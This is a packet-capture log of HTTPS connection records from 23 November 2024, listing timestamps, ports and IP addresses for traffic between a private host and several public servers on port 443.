Nov 23, 2024 07:09:31.484965086 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.492034912 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.492065907 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.492121935 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.492130041 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.492163897 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.492180109 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.492873907 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.492901087 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.492969036 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.492974997 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.493017912 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.493017912 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.498034000 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.498116970 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.498120070 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.498207092 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.504412889 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.504462004 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.504511118 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.504519939 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.504571915 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.504595995 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.514801979 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.514827013 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.515604019 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.515619993 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.518610001 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.518655062 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.518675089 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.518683910 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.518724918 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.518734932 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.532736063 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.532778978 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.532819986 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.532828093 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.532857895 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.532877922 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.546004057 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.546052933 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.546087027 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.546094894 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.546123028 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.546143055 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.560107946 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.560152054 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.560173035 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.560182095 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.560209990 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.560223103 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.662081003 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.662139893 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.662154913 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.662167072 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.662197113 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.662214994 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.673424006 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.673449039 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.673888922 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.673897028 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.673947096 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.682722092 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.682744026 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.682780981 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.682791948 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.682807922 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.682830095 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.692727089 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.692754984 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.692799091 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.692810059 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.692850113 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.702557087 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.702579975 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.702620029 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.702630043 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.702640057 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.702663898 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.711519957 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.711546898 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.711591005 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.711596966 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.711635113 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.711653948 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.721276999 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.721298933 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.721338034 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.721344948 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.721374035 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.721395016 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.729728937 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.729760885 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.729814053 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.729820967 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.729859114 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.729878902 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.854993105 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.855036020 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.855068922 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.855084896 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.855113983 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.855132103 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.862607956 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.862632036 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.862704039 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.862711906 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.862746954 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.869278908 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.869301081 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.869340897 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.869348049 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.869391918 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.877006054 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.877032042 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.877082109 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.877089977 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.877131939 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.884582996 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.884608030 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.884646893 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.884654045 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.884691000 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.891874075 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.891901016 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.891938925 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.891946077 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.891983032 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.899439096 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.899461031 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.899487972 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.899493933 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.899533033 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.906089067 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.906121016 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.906152010 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.906158924 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.906207085 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.948115110 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.948136091 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.948151112 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.948199034 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.948235989 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.948246002 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:31.948292017 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:31.986943007 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.987015963 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.987062931 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:31.987062931 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:31.987086058 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.987169981 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:31.987178087 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.987229109 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:31.987310886 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:31.987310886 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:32.053612947 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.053646088 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.053715944 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.053730011 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.053783894 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.053783894 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.061141968 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.061167955 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.061223984 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.061230898 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.061280966 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.068869114 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.068896055 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.068948030 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.068955898 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.068998098 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.075562000 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.075586081 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.075632095 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.075638056 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.075676918 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.083177090 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.083198071 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.083244085 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.083250999 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.083288908 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.087081909 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.087137938 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.087146044 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.087197065 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.087238073 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.112169981 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:32.112191916 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:32.112251043 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.112736940 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.112751007 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.112765074 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.115191936 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.115197897 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.115668058 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.115714073 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.116014957 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.116025925 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.141222954 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.141707897 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.141721010 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.149663925 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.149694920 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.149732113 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.149745941 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.149775028 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.149791002 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.163532019 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.164913893 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.164923906 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.165597916 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.165604115 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.189431906 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.189459085 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.189505100 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.189531088 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.189563036 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.189583063 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.202398062 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:32.202481031 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:32.203512907 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:32.203567982 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:32.211766005 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.232628107 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.232656956 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.233547926 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.233556032 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.288266897 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.312192917 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.312201977 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.312716961 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.312722921 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.336247921 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.336282969 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.336343050 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.336354971 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.336388111 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.336476088 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.365817070 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.365844965 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.365885973 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.365895987 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.365928888 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.365947962 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.387604952 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.387659073 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.387732983 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.387765884 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.387811899 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.410221100 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.410243988 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.410281897 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.410299063 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.410329103 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.410350084 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.542028904 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.542082071 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.542119980 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.542130947 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.542175055 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.542200089 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.546761990 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.546832085 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.546942949 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.556237936 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.556296110 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.556427002 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.558568001 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.558590889 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.558619976 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.558629036 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.558655024 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.558677912 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.574883938 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.574903011 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.574971914 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.574981928 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.575041056 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.588763952 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.588787079 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.588828087 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.588840961 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.588871956 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.588891029 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.599623919 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.599703074 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.599761009 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.603477955 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.603498936 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.603559971 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.603570938 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.603617907 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.603638887 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.613116026 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.613141060 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.613172054 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.613178968 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.615427971 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.615447044 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.615521908 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.615530968 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.615571976 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.626322985 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.626359940 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.626374960 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.626384020 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.628236055 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.628236055 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.628264904 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.628279924 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.654891014 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.654963017 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.655080080 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.698570967 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.698570967 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.698586941 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.698595047 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.742356062 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.742422104 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.742480040 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.747206926 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.747229099 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.747273922 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.747297049 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.747322083 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.747335911 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.755665064 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.755696058 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.755734921 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.755753040 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.755780935 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.755798101 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.765229940 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.765250921 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.765294075 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.765312910 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.765331030 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.765355110 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.774823904 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.774846077 CET	443	49791	150.171.27.10	192.168.2.6
